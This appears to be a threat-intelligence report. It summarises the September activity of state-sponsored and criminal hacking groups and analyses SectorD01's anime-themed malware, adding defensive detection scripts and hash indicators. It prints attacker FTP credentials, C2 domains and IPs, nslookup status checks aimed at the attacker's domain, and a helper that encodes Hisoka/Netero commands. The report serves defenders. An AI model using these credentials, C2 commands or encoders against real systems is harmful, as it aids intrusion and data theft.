Since the hacking activities of the SectorB groups discovered in September are mostly concentrated in Southeast Asia, they appear to be closely related to the political and diplomatic activities of the SectorB government. The hacking activity of the SectorB groups is therefore expected to continue, especially in Southeast Asia and Europe.

3. SectorC Activity Features

A total of two hacking groups, SectorC01 and SectorC08, were found among SectorC hacking groups this September.

SectorC01 group activity was found in Europe and North America (including Ukraine, Canada, Belgium and the United Kingdom), while SectorC08 group activity was found in Ukraine, China, the United States, South Korea and Brazil. In the past the SectorC08 group was only seen operating in Europe; this is the first time its hacking activity has been found in East Asia (including China and South Korea), and additional analysis of its purpose is required. Although the SectorC groups whose activity was found use different hacking techniques, their spear phishing emails display common characteristics.

The SectorC01 group attaches Microsoft Word document malware to spear phishing emails and uses remote template injection techniques to deliver malware in Microsoft Word files containing macro scripts to their targets.

Similar to past cases, the SectorC08 group maintains its traditional approach of spear phishing emails with 7-Zip SFX (self-extracting) archives attached. However, we also confirmed that its hacking activity uses the remote template injection method, and the text content of the lure document used for the template injection was related to a specific conference.

The SectorC groups have many varied attack techniques because of their long history, and they are likely to continue a similar form of hacking in the future, as they continue to do so in line with the political objectives of the SectorC government.

4. SectorD Activity Features

A total of six hacking groups, SectorD01, SectorD02, SectorD05, SectorD10, SectorD14, and SectorD15 were found among SectorD hacking groups this September.

SectorD hacking groups targeted countries that are political rivals of the SectorD government. Their hacking activity discovered in September targeted countries located in the Middle East (including Morocco, Kuwait and the United Arab Emirates), as well as the United States, the United Kingdom, Canada, India, the Netherlands, the Philippines, Azerbaijan, Kenya, China, Australia, Hong Kong and Switzerland.

The basic hacking techniques of the SectorD groups are similar to previous cases: a Microsoft Word file with a malicious macro is sent to the target as an attachment to a spear phishing email. In addition, the SectorD05 group has launched attacks against researchers in the United States, the Middle East and France who focus on academic research about SectorD, and has performed phishing attacks aimed at SectorD dissidents in the United States.

The SectorD10 group also uses links in phishing emails to direct targets to spoofed sites disguised as user login pages, stealing the credentials that the targeted individuals enter.

The SectorD15 group conducted hacking activity aimed at gathering information on IT suppliers located in Saudi Arabia, which is likely to lead to a supply chain attack.

At the moment, diplomatic measures involving the SectorD government are underway in Western countries, mainly the United States. Such diplomatic activities could eventually lead to physical conflicts between countries, and it may be that these hacking activities are being used in cyberspace as preliminary reconnaissance.

5. SectorE Activity Features

A total of three hacking groups, SectorE02, SectorE03, and SectorE05, were found among SectorE hacking groups this September. Their activities were discovered in Europe (including Belgium, Portugal, the United Kingdom, France and Russia), Southeast Asia (including Singapore, Sri Lanka, the Philippines and Thailand), East Asia (including Taiwan and China), North America (including the United States and Canada), and Central Asia (including Pakistan and Turkmenistan).

SectorE hacking groups mainly conducted hacking activities targeting countries that are politically competitive with the SectorE government, but recently the range of geographical hacking activities of these groups is gradually widening.

The basic hacking technique of the SectorE groups is a document attached to a spear phishing email: a Microsoft Office document with a malicious macro or one exploiting a previously known code execution vulnerability, or a file for the InPage software that is widely used only in certain regions. They hosted malware in the form of Microsoft Word documents containing macro scripts on a specific domain; the document performs a remote template injection, querying the attacker’s server to download the additional macro template from their domain.
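The remote template injection used by the SectorC01 and SectorC08 groups above and by the SectorE groups here can be spotted before the document is ever opened. As an added illustration that is not code from the original report or from any of these groups: a .docx is a zip archive, and the template Word attaches on open is declared as an “attachedTemplate” relationship in word/_rels/settings.xml.rels; when that relationship has TargetMode="External" and an http(s) or UNC target, Word fetches the template, macros included, from that location. The script below builds a minimal sample document in memory (the template URL in it is a placeholder, not an indicator from the report) and checks it for that pattern.

```python
"""Flag Word documents that fetch a remote (attached) template.

Added example; not code from the original report or from any of the groups
described. A .docx is a zip archive, and Word reads the template to attach
from an 'attachedTemplate' relationship in word/_rels/settings.xml.rels. When
that relationship has TargetMode="External" and an http(s) or UNC Target,
Word downloads the template (macros included) when the document opens.
The sample document is constructed in memory; its URL is a placeholder.
"""
import io
import re
import xml.etree.ElementTree as ET
import zipfile
from typing import Dict, List, Optional

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
RELS_PARTS = ("word/_rels/settings.xml.rels", "word/_rels/document.xml.rels")
REMOTE_TARGET = re.compile(r"^(https?:|\\\\)", re.IGNORECASE)


def find_remote_templates(docx_bytes: bytes) -> List[Dict[str, str]]:
    """Return one record per external attachedTemplate relationship found."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        names = set(zf.namelist())
        for part in RELS_PARTS:
            if part not in names:
                continue
            root = ET.fromstring(zf.read(part))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if not rel.get("Type", "").endswith("/attachedTemplate"):
                    continue
                target = rel.get("Target", "")
                # A template stored inside the package is normal; an external
                # http(s)/UNC target is the remote template injection pattern.
                if rel.get("TargetMode") == "External" and REMOTE_TARGET.match(target):
                    hits.append({"part": part, "id": rel.get("Id", ""), "target": target})
    return hits


def build_sample_docx(template_url: Optional[str]) -> bytes:
    """Constructed minimal .docx with just enough structure for the check above."""
    rels = [f'<Relationships xmlns="{REL_NS}">']
    if template_url:
        rels.append(
            '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/'
            'officeDocument/2006/relationships/attachedTemplate" '
            f'Target="{template_url}" TargetMode="External"/>'
        )
    rels.append("</Relationships>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/settings.xml", "<settings/>")
        zf.writestr("word/_rels/settings.xml.rels", "".join(rels))
    return buf.getvalue()


if __name__ == "__main__":
    lure = build_sample_docx("http://template.invalid/report.dotm")  # placeholder URL
    for hit in find_remote_templates(lure):
        print(f"remote template in {hit['part']}: {hit['target']}")
    print("clean document:", find_remote_templates(build_sample_docx(None)))
```

The same check applies to .dotm/.docm files and, with the part name changed, to settings relationships in other Office packages; a mail gateway can run it on attachments without rendering the document, which is the point: the relationship is visible long before any macro executes.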

As the SectorE Group geographical radius of activity appears to be widening, they will likely continue to evolve and develop new hacking techniques. In past cases, whenever the geographic radius of hacking groups’ targets expanded, so did their hacking skills.

6. SectorF Activity Features

Hacking activity of the SectorF01 group was discovered this September, and the hacking activity was found in Asia (including Vietnam, China, Cambodia and Japan), and in Europe (including the United Kingdom and Germany).

The hacking activity found in September included malware similar to previously found malware: a RAR archive containing an executable disguised with a Microsoft Word icon and a malicious DLL, consistent with the group’s existing technique. The SectorF01 group uses DLL side-loading to carry out the attack: when the executable disguised as Microsoft Word is run, it loads and executes the DLL placed in the same folder.
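Both this SectorF01 case and the GetCurrentRollback.exe / GetCurrentDeploy.dll pairing described in the Hong Kong report above come down to one observable: an executable loading a DLL from its own, user-writable directory. The following is an added example, not code from the original report, showing that detection over Sysmon-style Image Loaded (Event ID 7) records. The events are constructed for illustration; Sysmon records Signed/Signature for the loaded DLL only, so the ProcessSignature field used to rank a Microsoft-signed host process highest is an assumed enrichment.

```python
"""Detect DLL side-loading from Sysmon-style Image Loaded (Event ID 7) records.

Added example, not code from the original report. Each event names the loading
process (Image), the DLL (ImageLoaded) and the DLL's Signed/Signature fields as
Sysmon records them. ProcessSignature is an assumed enrichment (Sysmon does not
attach the process's signer to Event 7). All events below are constructed.
"""
import ntpath
from typing import Dict, List

# Directories where an EXE loading a DLL from its own folder is expected.
PROTECTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def _dir(path: str) -> str:
    """Lower-cased directory of a Windows path with a trailing backslash."""
    return ntpath.dirname(path).lower().rstrip("\\") + "\\"


def sideload_findings(events: List[Dict]) -> List[Dict]:
    """Return one finding per Image Loaded event that looks like side-loading."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 7:
            continue
        proc_dir, dll_dir = _dir(ev["Image"]), _dir(ev["ImageLoaded"])
        if proc_dir != dll_dir or dll_dir.startswith(PROTECTED_ROOTS):
            continue  # DLL elsewhere, or a normal install location
        dll_unsigned = not ev.get("Signed", False)
        proc_sig = ev.get("ProcessSignature")  # assumed enrichment, see docstring
        mismatch = bool(proc_sig) and ev.get("Signature") != proc_sig
        if not (dll_unsigned or mismatch):
            continue
        # Highest concern: a Microsoft-signed host pulling an unsigned DLL from a
        # user-writable folder (the GetCurrentRollback.exe pattern).
        severity = "high" if (proc_sig == "Microsoft Windows" and dll_unsigned) else "medium"
        reason = ("unsigned DLL loaded from process directory" if dll_unsigned
                  else f"DLL signer {ev.get('Signature')!r} differs from process signer {proc_sig!r}")
        findings.append({"severity": severity, "process": ev["Image"],
                         "dll": ntpath.basename(ev["ImageLoaded"]), "reason": reason})
    return findings


# Constructed sample events (not real telemetry). The DLL name in the second
# event is invented; the report does not name SectorF01's DLL.
SAMPLE_EVENTS = [
    {"EventID": 7, "Image": r"C:\Users\victim\Downloads\GetCurrentRollback.exe",
     "ImageLoaded": r"C:\Users\victim\Downloads\GetCurrentDeploy.dll",
     "Signed": False, "Signature": "", "ProcessSignature": "Microsoft Windows"},
    {"EventID": 7, "Image": r"C:\Users\victim\Desktop\Contract\Contract.exe",
     "ImageLoaded": r"C:\Users\victim\Desktop\Contract\sample.dll",
     "Signed": False, "Signature": "", "ProcessSignature": None},
    {"EventID": 7, "Image": r"C:\Windows\System32\svchost.exe",
     "ImageLoaded": r"C:\Windows\System32\ntdll.dll",
     "Signed": True, "Signature": "Microsoft Windows", "ProcessSignature": "Microsoft Windows"},
    {"EventID": 7, "Image": r"C:\Program Files\Vendor\app.exe",
     "ImageLoaded": r"C:\Program Files\Vendor\helper.dll",
     "Signed": False, "Signature": "", "ProcessSignature": "Vendor Inc"},
    {"EventID": 7, "Image": r"C:\Users\victim\Downloads\tool.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll",
     "Signed": True, "Signature": "Microsoft Windows", "ProcessSignature": None},
]

if __name__ == "__main__":
    for f in sideload_findings(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['process']} -> {f['dll']}: {f['reason']}")
```

The protected-root allowlist is what keeps this quiet in practice: legitimate software in Program Files loads its own DLLs from its install directory all day, so the rule only fires for executables run from Downloads, Desktop, Temp and similar locations, which is exactly where a RAR-delivered EXE/DLL pair or a copied-out Windows binary lands.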

As their hacking activity has often been discovered in regions including SectorF itself in the past, it may be aimed at people who oppose the political activities of the SectorF government. However, since SectorF hacking activity is also conducted for the purpose of economic development, additional analysis is needed while tracking the regions and targets of their activity.

7. SectorH Activity Features

Hacking activity of the SectorH01 group was discovered this September; compared with other government-supported hacking groups, this group is observed relatively infrequently.

SectorH01’s hacking activity discovered in September was found in India, Kenya, Georgia, China, South Korea, Hong Kong, New Zealand and Canada. The SectorH01 group distributes malware in the form of Microsoft Excel files containing macro scripts through spear phishing emails. The macro script executes JavaScript code hosted on Pastebin, which uses PowerShell to download the injector and the DLL to be injected into the infected system, and then registers an autorun entry for persistence.

The SectorH01 group’s increased and broadening hacking activity highlights the dynamics of competition between SectorE and SectorH. It is worth paying close attention to whether this increased hacking activity will affect the future relationship between the two countries and the international situation.

8. Cyber Crime Activity Features

Hacking activity of the SectorJ01, SectorJ02, SectorJ04, SectorJ05, and SectorJ09 groups was discovered this September.

Unlike the government-sponsored hacking groups, the SectorJ groups seize information of financial value to make money in the real world, directly hack specific companies and organizations and run ransomware on their internal networks, or steal important industrial secrets in order to intimidate and extort victims.

SectorJ01 group activity was found in the United States, Russia, France, Bulgaria, China, United Kingdom, Poland, Germany, India, and Romania. The group used executables disguised as installers for Chrome or Firefox browsers, and used the NSIS (Nullsoft Scriptable Install System) to combine malware and normal browser installation files into one executable format.

SectorJ02 group activity was found in the United Kingdom and the United States. They sent spear phishing emails containing a link to download a JavaScript backdoor. Once installed, the malware resides in memory; when the victim accesses an online payment page, skimming code is injected into the HTML Document Object Model and collects the payment information the user types in.

SectorJ04 group activity was found in a wide range of locations – Europe (including Italy, Poland, Denmark, United Kingdom, Slovenia, Greece), East Asia (including South Korea, Japan), Middle East (including United Arab Emirates), Argentina, Philippines, Canada, India, Malaysia and the United States.

For some time the group has been using spam emails with Office-themed Microsoft Excel or Word documents attached, installing malware on the infected system which transmits the information it collects to a specific server.

SectorJ05 group activity was found in the United Kingdom, Hong Kong, China, Germany, India, Netherlands, Sri Lanka, Belarus, the United States, and Russia. They primarily used malicious documents containing macro scripts, CHM files, or malicious attachment in the form of LNK shortcut files.

SectorJ09 group activity was found in Italy. They launched an attack on e-commerce service providers, injecting JavaScript into the payment page of a hotel website that uses a particular e-commerce service so that it loads a remote script. Only when the page is accessed from a mobile device is a skimmer script loaded to steal credit card information.



SectorD01: When anime goes cyber

Multiple organizations in Kuwait have been targeted since 2018 by a threat actor we track as SectorD01, whose primary targets appear to be located in the Middle East but also observed by us to target North America, Europe, South Asia and East Asia in other campaigns. In this analysis we will briefly go through some of the tools used by this threat actor in the campaign which are named Sakabota, Diezen, Gon, Hisoka, Netero, and EYE, and explain how these tools are linked to each other and to other activity in the region.

Sakabota

When we looked at 21 samples of the tool named Sakabota, we noticed the file internal comments “Blade for not to killing” and the file’s icon which resembles a scar and has the internal name “Icon_kenshin”. “Kenshin” is the name of the main character with that scar from the Japanese anime “Rurouni Kenshin”, otherwise known as “Samurai X” to English viewers. His sword is named Sakabatō, which is a reverse-edge sword which does not kill, and this lines up with the file internal comments of “not to [sic] killing”.

The samples we looked at had the version numbers 1.4, 1.5, 1.6, 2.5, and 2.6. Some of its functions include using WMIC/PSEXEC/dsquery/Mimikatz/plink/RAR, FTP uploading to ftp://www[.]pasta58[.]com with credentials “administrator”/”Mono8&^Uj”, downloading files, taking screenshots, performing RDP, IP/port scanning across common services, dropping the svhost.exe agent / Shell.aspx web shell (see below), clearing traces of itself, and closing itself. The hardcoded C2 addresses are set as pasta58[.]com and 176[.]9[.]235[.]101, and hardcoded DNSCAT C2 address as 217[.]79[.]183[.]33.

Besides the functionality changes across versions, the threat actor also attached various resources to the malware. Different samples had different resources attached to them, and this was irrespective of the version codes.

Name: Description

dsquery (v5.2.3790.3959): Trusted Microsoft command-line utility for querying Active Directory Services.

k: Most of the “k” resources we saw were empty, but there was one which contained a sort of cheat sheet of different commands which the attacker could use for many techniques such as password cracking, passing the hash, dumping passwords, using certutil, and using the other embedded resources. Interestingly, in one section of the cheat sheet, there were URL examples of how to access a web shell which could possibly be a GET version of LittleFace. This web shell URL contained the domain of a Taiwanese university, suggesting the university may have been compromised in the past.

nircmd (v2.81): 64-bit NirCmd command-line utility from NirSoft.

plink (v0.62): Command-line PuTTY.

PowerCat_DNS_small: A shortened version of the open-source powercat PowerShell utility.

rar (v4.20): 64-bit command-line WinRAR.

Local: Trusted Microsoft utility which has so far only been publicly reported to be used by TwoFace in 2017.

PSEXEC (v2.2): Signed and trusted Sysinternals/Microsoft PsExec utility. This is an old version of PsExec which allows the attacker to bypass the graphical EULA using the “-accepteula” flag.

Shell: Custom Shell.aspx web shell which uses MD5 hashing to check the password given in the “id” parameter of the POST request. There are some commonalities between this web shell and the IntrudingDivisor web shell used by TwoFace, but this web shell is more limited in functionality and is used for uploading files or executing commands via “cmd.exe /c”. It is created under the \dayzen directory relative to Sakabota when the attacker clicks on the “Shell” button in Sakabota. Only four samples of Sakabota contained the embedded Shell.aspx.

svhost: The executable svhost.exe dropper for the PowerShell malware Unit 42 named CASHY200, which accesses the C2 firewallsupports[.]com. This dropper had not been previously linked to the Sakabota malware. It is created under the \dayzen directory relative to Sakabota when the attacker clicks on the “Agent” button in Sakabota. Only one sample of Sakabota contained the embedded svhost.exe.

Diezen: Another backdoor with the picture of a samurai used by the attacker, which connects to pasta58[.]com, the same C2 server as Sakabota.

Another interesting thing to note is that the Sakabota malware was made to work not only with the embedded resources above, but also with Mimikatz which we believe was not embedded due to the likelihood of Sakabota being detected more easily. All of these tools together bear a striking resemblance to the various tools uploaded to a TwoFace web shell in the past.

Sakabota in GUI mode contains a wrapper for Mimikatz, which is not embedded in the malware.

Diezen

Diezen is a simple backdoor which can be dropped by Sakabota which is set to connect to the same C2 address, pasta58[.]com, using a custom non-HTTP protocol over port 443 via the .NET TcpClient class primarily to execute attacker commands via “cmd.exe /c”. The samples we looked at had the version numbers 0.0.1, 0.5, and 0.6.

By the time Diezen reached version 0.6, it switched over to port 80 and added new functionality for file upload, download, taking screenshots, checking the user’s public IP via checkip[.]dyndns[.]org and checking if an alternative autostart location – the Start Menu – was available besides its normal usage of scheduled tasks. The feature of checking the user’s public IP was later carried over to the Hisoka malware as well, alongside implementing the previously unimplemented decryption and encryption routines, while the screenshot feature was carried over to the Gon malware.

Gon

Gon is the main character from the Japanese anime “Hunter × Hunter”. When looking at Gon and the other “Hunter × Hunter” themed malware, their code appears to have been originally branched out from the Sakabota malware. In Gon’s case, not only are there the embedded resources dsquery and plink, a large part of the non-GUI code is exactly the same and in fact still has remnants of “Sakabota” in one of its strings.

Just as the various versions of Sakabota have added functionality which was in its code but previously unimplemented, Gon has implemented some of Sakabota’s previously unimplemented code and also contains a password list of slightly over 1000 passwords, mainly variations around digits, the word “password”, and the word “kuwait”. These passwords are used by the tool for brute forcing.

EYE

EYE is the name of another simple tool we believe to be part of the attacker’s “Hunter × Hunter” themed toolset. The purpose of EYE is to log new processes created and to clear the attacker’s tracks when the attacker unexpectedly disconnects due to a new user logon. When looked at together with the other anime themed malware and the file icon, we believe the attacker thought of EYE as the scarlet eyes in “Hunter × Hunter”, giving the attacker additional capabilities when the attacker is emotionally agitated.

Ascii art from EYE using Japanese kaomoji. The square box ロ is actually the Japanese kana character “ro”.

In fact, this clearing of tracks upon disconnection is not a capability unique to the EYE malware, as the exact same function exists in Sakabota. It hooks the .NET event SystemEvents.SessionSwitch so that if the attacker gets disconnected unexpectedly due to a new user logon, it closes all processes created after EYE was opened and deletes files and registry keys related to attacker activity: recently accessed files, both automatic and custom jump lists (first introduced in Windows 7), remote desktop history, search terms, autocomplete, and Start Menu run history. It then closes and deletes itself.

Hisoka and Netero

Hisoka and Netero are also two important characters in the Japanese anime “Hunter × Hunter”.

Running Hisoka 0.8 with the argument “66” creates a “Help.txt” file in the same folder containing instructions on how to use and interact with Hisoka from both the victim’s and the attacker’s machine. It also contains functionality to query Active Directory via LDAP, which is likely meant to take over the role of the dsquery utility embedded in Sakabota. Funnily enough, the function is contained in an “AI” class of Hisoka which is most certainly not AI, proving that even threat actors have joined the hype.

Hisoka is able to communicate with the attacker’s C2 server using a proper HTTP request over port 80 (unlike Diezen, which had its custom protocol and would be easily detected over the network) and DNS over port 53.

For its HTTP C2, it uses the hardcoded user agent string “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36” of Chrome version 73, which was released on March 12, 2019.

For its DNS C2, it has an unused feature that runs nslookup.exe against hisoka[.]<C2_Address> in order to check its status, which may be useful for checking later versions we have not seen. Example commands for performing its status check are:

  • nslookup.exe -type=”A” hisoka[.]microsofte-update[.]com 8.8.8.8
  • nslookup.exe -type=”TXT” hisoka[.]microsofte-update[.]com 8.8.8.8
Hisoka v0.8

On the other hand, the Netero malware is a helper utility and loader built for Hisoka and in fact cannot function without it. Unlike Hisoka, the attacker does not interact with Netero via command-line arguments but has to interact via modifying an obfuscated “command” in the registry. The way Netero loads and encrypts/decrypts data from the registry is similar to Hisoka – various registry keys from HKCU\EUDC\313\hisoka_v2 (Hisoka uses HKCU\EUDC\313\hisoka) are loaded, XOR-ed with 0x53, then Base64 decoded.

The attacker’s commands are loaded from HKCU\EUDC\313\hisoka_v2\CM and checked every 1-4 seconds. All of the other configuration, including the kind of C2 server to use, is loaded in the same way and checked constantly, with the result of any command returned in another registry key. In this way the attacker can interact constantly with Netero purely via the registry and no longer needs a GUI or CLI. Since every command written to the registry has to be XOR-ed and Base64 encoded, the attacker is most likely using another wrapper program for this interaction.
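The registry encoding described for Hisoka and Netero (values XOR-ed with 0x53, then Base64 decoded) is simple enough to reproduce, which is useful both for reading exported registry hives from a compromised host and for understanding what the operator’s wrapper has to write. The following is an added example and not the threat actor’s code: the XOR key, the hisoka_v2 key path and the CM value name are taken from the analysis above; the ENGINE value name is an assumption, and the registry is simulated with a dict of constructed values.

```python
r"""Encode/decode the registry-stored commands described for Hisoka/Netero.

Added example, not the threat actor's code. The report states that values under
HKCU\EUDC\313\hisoka_v2 are XOR-ed with 0x53 and then Base64 decoded; this
reverses that order to show what an operator's wrapper must write, and decodes
exported values for triage. Registry access is simulated with a dict; the value
name CM comes from the report, ENGINE is an assumed name for the C2-type setting.
"""
import base64
import re
from typing import Dict, Optional

XOR_KEY = 0x53
B64_ALPHABET = re.compile(rb"^[A-Za-z0-9+/]*={0,2}$")


def xor53(data: bytes) -> bytes:
    """Single-byte XOR with 0x53; the operation is its own inverse."""
    return bytes(b ^ XOR_KEY for b in data)


def encode_value(plaintext: str) -> bytes:
    """Operator side: Base64 first, then XOR, mirroring the decode order reported."""
    return xor53(base64.b64encode(plaintext.encode("utf-8")))


def decode_value(stored: bytes) -> Optional[str]:
    """Implant/analyst side: XOR with 0x53, then Base64 decode.

    Returns None when the blob was not produced by this scheme, so the function
    doubles as a triage filter over arbitrary registry values.
    """
    unxored = xor53(stored)
    if len(unxored) % 4 or not B64_ALPHABET.match(unxored):
        return None
    try:
        return base64.b64decode(unxored, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


def decode_registry_export(values: Dict[str, bytes]) -> Dict[str, Optional[str]]:
    """Decode every value under the simulated hisoka_v2 key."""
    return {name: decode_value(blob) for name, blob in values.items()}


# Constructed stand-in for the values under HKCU\EUDC\313\hisoka_v2.
SAMPLE_KEY = {
    "CM": encode_value("whoami /all"),       # the command slot named in the report
    "ENGINE": encode_value("dns"),           # assumed name for the C2-type setting
    "UNRELATED": b"\x00\x01\x02binary-not-ours",
}

if __name__ == "__main__":
    for name, value in decode_registry_export(SAMPLE_KEY).items():
        print(f"{name}: {value!r}")
```

Because the XOR key is a single byte, the stored Base64 text is only lightly disguised: XOR-ing a candidate value with 0x53 and checking that the result is valid Base64 is a cheap test to run across a whole exported hive, and the same approach recovers the result values Netero writes back for the operator.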

The attacker also added another C2 “engine” to the Netero malware’s functionality. While Hisoka could previously already communicate with its C2 server via DNS and HTTP, Netero is also able to communicate with the C2 server via EWS (Microsoft Exchange Web Services), interacting with Microsoft Exchange servers using saved drafts in a manner reminiscent of how it interacts with the attacker via the registry.

Netero shows Hisoka’s output as it is just a helper utility

Both Hisoka and Netero are stated to be “Compatible with Sakabota v3.4”, while later samples of Diezen were compatible with v2.0 and v2.1. While we did not find any version 3 or above samples of Sakabota, this shows that Sakabota is still in active development alongside the “Hunter × Hunter” themed malware, and the end goal is likely for either Sakabota or Hisoka to act as the wrapper for all of the other malware that interacts via the command line or registry, similar to how Sakabota already acts as a wrapper for many other tools such as Mimikatz and PsExec.

Conclusion

Based on the attacker’s personal cheat sheet, the chunks of code dedicated to finding server software, and the internal web shell code, it is quite likely that one of the initial access routes used by the attacker is attacking organization web servers through SQL injection vulnerabilities for web shell upload, and organizations likely to be targeted should take note of this.

Also, since SectorD01 was first discovered in 2016, they have had a penchant for using DNS for C2 communications in their various malware, up to the present. One easy way to detect this is to monitor the network for suspicious DNS traffic, although DNS over HTTPS may mask this in the future. It remains to be seen whether the other teams of SectorD01 will take up EWS as a C2 protocol as well.
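What “monitoring for suspicious DNS traffic” looks like for this toolset follows from the Hisoka status check shown earlier: repeated TXT lookups for a fixed label under the C2 zone, sent by nslookup.exe straight to 8.8.8.8 rather than the enterprise resolver, and, for a DNS C2 channel carrying data, a stream of high-entropy subdomains. The script below is an added example, not code from the original report: it scores constructed query-log lines in the format “<timestamp> <client> <resolver> <qtype> <qname>”. The zone microsofte-update[.]com and the hisoka label come from the analysis above; the approved resolver address, thresholds and all log lines are sample values.

```python
"""Score DNS query logs for C2-like behaviour: TXT lookups, encoded subdomains
and use of resolvers other than the enterprise ones.

Added example, not from the original report. Log lines are constructed in the
format "<ts> <client> <resolver> <qtype> <qname>"; the zone and the hisoka label
come from the Hisoka analysis above, everything else is sample data.
"""
import math
from collections import defaultdict
from typing import Dict, List, Tuple

APPROVED_RESOLVERS = {"10.0.0.2"}   # assumed enterprise resolvers
TXT_THRESHOLD = 3                    # TXT lookups per zone before it is reported
ENCODED_LABEL_THRESHOLD = 5          # distinct high-entropy labels per zone
ENTROPY_THRESHOLD = 3.5              # bits per character; encoded data scores high


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character of s (0 for an empty string)."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname: str) -> Tuple[str, str]:
    """Return (registrable zone, leftmost label); assumes single-label TLDs."""
    parts = qname.rstrip(".").lower().split(".")
    zone = ".".join(parts[-2:])
    label = parts[0] if len(parts) > 2 else ""
    return zone, label


def analyse(lines: List[str]) -> Dict[str, List[str]]:
    """Map each suspicious zone to the reasons it was flagged."""
    txt_count = defaultdict(int)
    encoded_labels = defaultdict(set)
    foreign_resolvers = defaultdict(set)
    for line in lines:
        _ts, client, resolver, qtype, qname = line.split()
        zone, label = split_name(qname)
        if qtype == "TXT":
            txt_count[zone] += 1
        if label and shannon_entropy(label) >= ENTROPY_THRESHOLD:
            encoded_labels[zone].add(label)
        if resolver not in APPROVED_RESOLVERS:
            foreign_resolvers[zone].add(f"{client}->{resolver}")

    findings = defaultdict(list)
    for zone, n in txt_count.items():
        if n >= TXT_THRESHOLD:
            findings[zone].append(f"{n} TXT lookups (Hisoka-style status/C2 channel)")
    for zone, labels in encoded_labels.items():
        if len(labels) >= ENCODED_LABEL_THRESHOLD:
            findings[zone].append(f"{len(labels)} high-entropy subdomains (data encoded in queries)")
    for zone, pairs in foreign_resolvers.items():
        findings[zone].append("non-approved resolver: " + ", ".join(sorted(pairs)))
    return dict(findings)


# Constructed sample log (not real traffic). The first block mimics the
# nslookup status checks; the encoded labels mimic a data-carrying DNS channel.
SAMPLE_LOG = [
    "2019-09-10T10:00:01Z 10.0.0.5 8.8.8.8 A hisoka.microsofte-update.com",
    "2019-09-10T10:00:02Z 10.0.0.5 8.8.8.8 TXT hisoka.microsofte-update.com",
    "2019-09-10T10:00:32Z 10.0.0.5 8.8.8.8 TXT hisoka.microsofte-update.com",
    "2019-09-10T10:01:02Z 10.0.0.5 8.8.8.8 TXT hisoka.microsofte-update.com",
    "2019-09-10T10:01:32Z 10.0.0.5 8.8.8.8 TXT hisoka.microsofte-update.com",
    "2019-09-10T10:02:00Z 10.0.0.5 10.0.0.2 A k3d9qz2lm7xwp4vt.microsofte-update.com",
    "2019-09-10T10:02:01Z 10.0.0.5 10.0.0.2 A a8f1hj6ncy5brd0e.microsofte-update.com",
    "2019-09-10T10:02:02Z 10.0.0.5 10.0.0.2 A q2wz7x9ls4mk3vnp.microsofte-update.com",
    "2019-09-10T10:02:03Z 10.0.0.5 10.0.0.2 A t5gy1u8ob3ie7dfa.microsofte-update.com",
    "2019-09-10T10:02:04Z 10.0.0.5 10.0.0.2 A m9ch2kv6qa4xl1sn.microsofte-update.com",
    "2019-09-10T10:02:05Z 10.0.0.5 10.0.0.2 A z4ep7rw0jt3yb8nd.microsofte-update.com",
    "2019-09-10T10:05:00Z 10.0.0.7 10.0.0.2 A www.example.com",
    "2019-09-10T10:05:01Z 10.0.0.7 10.0.0.2 A mail.example.com",
    "2019-09-10T10:05:02Z 10.0.0.7 10.0.0.2 TXT _dmarc.example.com",
]

if __name__ == "__main__":
    for zone, reasons in analyse(SAMPLE_LOG).items():
        print(zone)
        for r in reasons:
            print("  -", r)
```

The resolver check is the one that survives DNS over HTTPS least well, since an implant using DoH never touches port 53 at all; the TXT and entropy checks then have to move to the DoH egress point or to endpoint telemetry, which is why the note above about DoH masking this traffic matters.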

We believe Gon and the other “Hunter × Hunter” themed malware were branched off from Sakabota (and Diezen) to get around Sakabota’s large file size and eventually compartmentalize the attacker’s various tools into a sort of framework as their capabilities mature.

Indicators of Compromise (IoCs)

Sakabota

Attacker Resources Embedded in Sakabota

CC73D71CC86D9336652A2073AB176B8E3394CCAB95B7B4897724C987656D9AC5
0D7FCD262DF1D8961F2A5A4EBE054A6EFBA42B4156EA64557E05C8F7D29667B5
B2FB0DA6832E554194B59C817922770AF13D474179A1C0381809676EF2709D24
FFE2E9B274B00EA967C96ECA9C177048C35DE75599488F1B8BE5AE1CCEBA00D9
054736B827E07D5E461B0A900AD54B0BCB58BDC23A5C607697A1E6C452B3570D

Legitimate/Gray Resources Embedded in Sakabota

4C8C4E574B9D1DC05257A5C17203570FF6384D031C6E6284FBC0020FE63B719E
5BFA034F7555A38E64C078AF71B4FF8C49511579FA826A87661940B7E9A6E333
04E5F50DD90D5B88B745EF108C06A3EF1E297018CB3FE8ACC80DD55250DFEE68
EA139458B4E88736A3D48E81569178FD5C11156990B6A90E2D35F41B1AD9BAC1
450EBD66BA67BB46BF18D122823FF07EF4A7B11AFE63B6F269AEC9236A1790CD
3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF

Diezen

054736B827E07D5E461B0A900AD54B0BCB58BDC23A5C607697A1E6C452B3570D
0EA5565C15303C56C69BBADEE462E9C63DBD6EE52F00F187E435AF224A48795B
19E3B10056E33FA7559DAF8D9A5104EBB313675A2B4DACA37BAB7DA1A49C2E0F
FF0BD8F8DEE90BA71A491F17B9FDA52C918EF9D3580D562029268A99B7410E19

“Hunter × Hunter” Themed Malware

84122B55E5552AF1752A00F1A268247FECA7E7DBEB4C4CD7B3F5A3005A19FE16
8391C571BFFB3CE538ACE4D8A3388B28EB486CCA5BDAB08AB7B568B4E8FC0EC8
892D5E8E763073648DFEBCFD4C89526989D909D6189826A974F17E2311DE8BC4
